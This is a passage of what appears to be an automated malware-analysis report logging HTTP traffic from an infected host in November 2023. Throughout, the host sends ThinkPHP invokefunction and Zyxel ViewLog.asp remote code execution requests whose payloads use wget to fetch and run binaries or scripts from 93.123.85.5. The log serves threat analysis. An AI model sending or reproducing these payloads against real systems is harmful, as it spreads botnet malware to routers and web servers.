                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              628192.168.2.233697631.200.106.2408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.627679110 CET12498OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              629192.168.2.236041094.122.124.288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.628211975 CET12498OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              63192.168.2.2349934112.213.93.17580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:19.299124002 CET2461OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:19.637301922 CET2466INHTTP/1.0 404 Not Found
                                                              X-Frame-Options: sameorigin
                                                              X-XSS-Protection: 1
                                                              Server: WDaemon/4.0
                                                              Date: Mon, 13 Nov 2023 21:18:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 93
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              630192.168.2.234627494.122.119.278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.628334999 CET12499OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              631192.168.2.234669695.38.226.22580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.847389936 CET12545OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:42.288604021 CET12619INHTTP/1.1 200 OK
                                                              Server: RTK Web 0.9
                                                              Set-Cookie: SessionID=; path=/
                                                              Content-Type: text/html
                                                              Content-Length: 151
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 2e 68 74 6d 22 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><meta HTTP-EQUIV="Pragma" CONTENT="no-cache"><script language='javascript'>parent.location="/login.htm"</script></head><body></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              632192.168.2.234496488.208.243.25280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:42.579148054 CET12622OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:42.873516083 CET12644INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:42 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              633192.168.2.235191288.157.217.15680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.185357094 CET12844OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:45.799653053 CET13083OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:47.687381029 CET13312OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:51.622876883 CET13786OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:59.301920891 CET14765OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:14.403881073 CET16673OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:46.143847942 CET20523OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              634192.168.2.233408888.81.210.1480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.239109039 CET12845OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:44.601702929 CET12852INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:44 GMT
                                                              Server: Apache/2.4.18 (Ubuntu)
                                                              Content-Length: 303
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 78 69 6f 6d 2d 69 74 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at axiom-it.ru Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              635192.168.2.234749485.31.62.1798080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.314930916 CET12847OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              636192.168.2.233287262.214.240.2448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.327341080 CET12848OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:44.654253006 CET12856INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:19:44 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              637192.168.2.235357888.221.127.17980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.479329109 CET12850OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:44.773089886 CET12881INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:44 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:44 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 63 36 31 31 33 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 38 34 26 23 34 36 3b 62 65 37 35 62 35 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3c611302&#46;1699910384&#46;be75b5c</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              638192.168.2.234937688.138.7.8280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.488390923 CET12851OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:45.415694952 CET12976OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:47.271552086 CET13239OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:51.110955000 CET13776OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:58.533943892 CET14642OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:13.380095005 CET16549OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:44.095921993 CET20340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              639192.168.2.233426831.221.13.1388080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.608243942 CET12853OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:44.902595997 CET12903INHTTP/1.1 307 Temporary Redirect
                                                              Date: Mon, 13 Nov 2023 21:19:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 152
                                                              Connection: close
                                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              64192.168.2.236088088.208.221.13880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:19.592267990 CET2464OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:19.883572102 CET2537INHTTP/1.1 400 Bad Request
